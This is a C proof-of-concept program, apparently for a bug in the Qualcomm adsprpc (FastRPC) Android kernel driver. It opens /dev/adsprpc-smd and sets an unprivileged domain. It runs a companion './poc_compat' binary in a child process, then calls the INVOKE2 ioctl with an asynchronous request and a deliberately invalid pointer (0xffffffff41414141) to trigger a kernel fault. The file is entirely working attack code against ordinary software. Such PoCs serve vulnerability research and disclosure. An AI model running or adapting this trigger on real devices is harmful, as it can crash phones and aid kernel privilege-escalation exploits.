#include <stdint.h>
#include "adsprpc_shared.h"
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
int main() {
    int adsprpc_fd = open("/dev/adsprpc-smd",O_RDONLY);
    if(adsprpc_fd == -1) {
        printf("open: %m\n");
        return 1;
    }
    printf("opened fd %d\n", adsprpc_fd);

    uint32_t info = 3; // 0 is privileged, 3 is unprivileged
    int getinfo_res = ioctl(adsprpc_fd, FASTRPC_IOCTL_GETINFO, &info);
    printf("getinfo returned %d\n", getinfo_res);

    printf("invoking child\n");
    char* arg[] = {"./poc_compat", NULL};
    if(!fork()) {
        execve("./poc_compat",arg,NULL);
        printf("execve: %m\n");
        return 1;
    }
    int ret = waitpid(-1,NULL,0);
    if(ret < 0)
    {
        printf("waitpid: %m\n");
        return 1;
    }
    printf("child exited\n");
    struct fastrpc_ioctl_invoke2 p = {
        .req = FASTRPC_INVOKE2_ASYNC,
        .invparam = 0xffffffff41414141,
        .size = 8
    };
    errno = 0;
    int res = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&p);
    printf("invoke2 called, returned %d (%m)\n", res);
}
